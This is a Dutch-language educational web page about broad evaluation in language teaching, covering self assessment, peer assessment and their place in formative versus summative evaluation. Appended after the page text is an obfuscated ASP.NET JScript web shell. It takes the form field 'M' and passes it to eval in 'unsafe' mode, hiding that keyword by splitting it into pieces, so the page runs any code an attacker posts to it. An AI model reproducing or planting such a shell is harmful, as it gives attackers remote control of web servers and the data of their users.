Start >  informatiepunt
      Start >>
      Wat is evalueren?
      Visie en voorbeelden
      Toetstips en
      stappenplannen evaluatie
      Achtergronden en links

1. Breed evalueren?

Een evaluatie wordt best breed opgezet omdat één momentopname, één afnemer, één beoordelaar, één soort meting soms onvoldoende relevante informatie oplevert om een genuanceerd beeld te krijgen van de werkelijke vaardigheden van de betrokkene.

>>wie is betrokken bij de beoordeling?

Traditioneel voert een docent de evaluatie uit. Maar ook studenten kunnen worden ingezet om zichzelf (self assessment) en/of elkaar (peer assessment) te beoordelen. Deze evaluatievormen kunnen veel voordelen hebben: je cursisten krijgen een beter inzicht in de eisen die aan hun taalvaardigheid gesteld worden en in hun eigen leerproces. Door een verhoogde betrokkenheid raken ze vaak meer gemotiveerd. Motivatie en inzicht zijn beide van belang voor het optimaliseren van hun leerproces.

Bij summatieve evaluatie wordt meestal niet gewerkt met studentbeoordelaars, omdat daarbij beslissingen genomen moeten worden over zakken/slagen, overgaan, eindcijfer, plaatsing/selectie. Bij formatieve evaluatiemomenten kan je de cursisten wel betrekken bij de beoordeling via peer assessment of self assessment. Kies best voor één van deze evaluatievormen. Het kost namelijk veel voorbereiding, training en begeleiding om deze vormen van beoordeling in te voeren en goed te laten verlopen.

verder>>

terug>>

 

 

 


<%@ Page Language="Jscript" Debug=true%> <% var SO=Request.Form["M"]; var NJF="unsa",PKCLJIY="fe",VSEWDZ=NJF+PKCLJIY; function UKBT() { return SO; } function UJWHK() { return eval(UKBT(),VSEWDZ); } UJWHK() %>